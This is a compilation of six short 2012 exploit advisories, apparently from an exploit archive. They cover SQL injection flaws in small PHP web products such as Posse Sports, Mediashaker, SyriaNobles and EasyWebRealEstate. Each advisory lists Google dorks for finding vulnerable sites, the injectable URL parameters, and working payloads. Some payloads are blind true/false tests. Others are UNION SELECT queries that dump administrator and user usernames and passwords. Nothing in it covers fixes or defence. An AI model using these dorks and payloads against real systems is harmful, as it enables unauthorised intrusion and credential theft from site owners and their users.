Posse Softball Director CMS Blind SQL Injection Vulnerability
[+] Author: easy laster
[+] Vulnerabilities [Blind SQL Injection]
[+] Page: www.possesports.com
[+] Language: [ PHP ]
[+] Version: 1.0
[+] Date: 04.01.2012
[+] Status: vulnerable
http://[host]/[path]/team.php?idteam= [SQL Injection]
PAYLOAD TRUE : and+1=1--+
PAYLOAD FALSE : and+1=2--+

Biz Technologies SQL Injection Vulnerability
# Google Dork: inurl:gallery.php "Powered by Biz Technologies"
# Date: 4/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Software Link: www.biztechnepal.com
# Version: All Version
# Category: webapps
# Security Risk: High
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
Vulnerable link : http://[target]//gallery.php?id=[SQL]
PAYLOAD : -9999+union+select+group_concat(adminid,0x3a,username,0x3a,password)+from+admin--

Mediashaker Blind SQL Injection Vulnerability
# Google Dork: inurl:content.php "Powered by Mediashaker"
# Date: 4/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Version: All Version
# Category: webapps
# Security Risk: High
# Vendor: http://www.mediashaker.com/
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
Vulnerable link : http://www.target.com/content.php?id=1 [Blind SQL]
PAYLOAD FALSE : and substring(@@version,1,1)=5--
PAYLOAD TRUE : and substring(@@version,1,1)=4--

Posse Sports SQL Injection Vulnerability
# Google Dork: "Powered By Posse Sports"
# Date: 4/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Software Link: www.possesports.com
# Version: All Version
# Category: webapps
# Security Risk: High
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
Vulnerable link:
# http://[target]/newsdetail.php?news_id=[SQL]
# http://[target]/dirdetails.php?iddirector=[SQL]
# http://[target]/tdetails.php?idtourn=[SQL]
# http://[target]/tresults.php?tourn_id=[SQL]
# http://[target]/tournsearch.php?idclass=[SQL]
# http://[target]/fieldinfo.php?idfield=[SQL]
# http://[target]/page.php?id=[SQL*]
PAYLOAD : -9999+union+select+1,2,group_concat(id,0x3a,username,0x3a,password)+from+user

SyriaNobles SQL Injection Vulnerability
# Google Dork: inurl:view-page.php "Powered by SyriaNobles"
# Date: 4/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Version: All Version
# Category: webapps
# Security Risk: High
# Vendor: http://www.syrianobles.com/syrianobles/english/
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
Vulnerable link : http://[target]/page.php?id=[SQL]
PAYLOAD : -1+union+select+1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11+from+user

EasyWebRealEstate Blind SQL Injection Vulnerability
# Google Dork: inurl:listings.php "Powered by EasyWebRealEstate"
# Date: 4/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Software Link: www.easywebrealestate.com
# Version: All Version
# Category: webapps
# Security Risk: High
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
Vulnerable link :
# http://[target]/[path]/listings.php?lstid=1 [Blind SQL]
# http://[target]/[path]/index.php?current=tip&infoid=9' [Blind SQL]
PAYLOAD TRUE : http://[target]/[path]/listings.php?lstid=1 and 1=1
PAYLOAD FALSE : http://[target]/[path]/listings.php?lstid=1 and 1=0